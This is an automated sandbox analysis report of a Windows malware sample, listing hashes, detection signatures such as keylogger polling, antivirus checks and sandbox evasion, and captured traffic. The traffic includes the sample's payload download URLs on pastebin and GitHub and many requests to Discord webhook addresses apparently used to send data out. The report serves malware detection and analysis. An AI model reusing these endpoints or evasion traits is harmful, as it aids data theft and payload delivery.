Windows Analysis Report
SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Analysis ID: 1620211
MD5: bf21f108ec9218572e4606fc33be277b
SHA1: 88edba97aba13aa8e4ad3dcffd817bd639ee919e
SHA256: c517b711c0469ffc0e8b53fcc18a9efe3632c8b4ab3844245569298730957e62
Tags: exeuser-SecuriteInfoCom
Infos:

Detection

Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Virustotal: Detection: 38% Perma Link
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe ReversingLabs: Detection: 39%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 91.4% probability
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Egor\source\repos\WindowsFormsApp32\WindowsFormsApp32\obj\Debug\RuntimeBroker.pdb/ source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: Binary string: C:\Users\Egor\source\repos\WindowsFormsApp32\WindowsFormsApp32\obj\Debug\RuntimeBroker.pdb source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe

Networking
barindex
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /4LkF0iPK HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kfocc557/kfocc/refs/heads/main/RuntimeBroker.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 110Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000Content-Length: 290Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/1340319227051249694/Ca6cXCrILucyEp_JrqzaHC37GI4_2qn465cM3N-JDhO-XyQu3UB3MEqzQUGrkhXDTqWw HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000Content-Length: 572Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/1339146559857754123/RdvE5BFpIVjJP7fStDbzM9nS9pXbrPaXzwJ6OjTc39Ubv9mEv5-MqpHfZROUd6443n-0 HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 466Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/1339146559857754123/RdvE5BFpIVjJP7fStDbzM9nS9pXbrPaXzwJ6OjTc39Ubv9mEv5-MqpHfZROUd6443n-0 HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comCookie: __dcfduid=2f3a2f08efb511efb06a36bf79b94bb5; __sdcfduid=2f3a2f08efb511efb06a36bf79b94bb5a8788863401173e47e9999bd2a673f2614f25f5bfb79d778debcc2baff39a351; __cfruid=49873027a79a78a0dcb514e65162d7425d6f2c9d-1740074693; _cfuvid=Tzum3I8QzSNi5ziKcHhAYJhHPg71dhrxtKk0hA4d5eo-1740074693243-0.0.1.1-604800000Content-Length: 485Expect: 100-continue
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: POST /api/webhooks/1339146559857754123/RdvE5BFpIVjJP7fStDbzM9nS9pXbrPaXzwJ6OjTc39Ubv9mEv5-MqpHfZROUd6443n-0 HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comCookie: __dcfduid=2f3a2f08efb511efb06a36bf79b94bb5; __sdcfduid=2f3a2f08efb511efb06a36bf79b94bb5a8788863401173e47e9999bd2a673f2614f25f5bfb79d778debcc2baff39a351; __cfruid=49873027a79a78a0dcb514e65162d7425d6f2c9d-1740074693; _cfuvid=Tzum3I8QzSNi5ziKcHhAYJhHPg71dhrxtKk0hA4d5eo-1740074693243-0.0.1.1-604800000Content-Length: 478Expect: 100-continue
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: POST /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000Content-Length: 142Expect: 100-continue
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View IP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox View IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View IP Address: 185.199.108.133 185.199.108.133
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /4LkF0iPK HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kfocc557/kfocc/refs/heads/main/RuntimeBroker.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
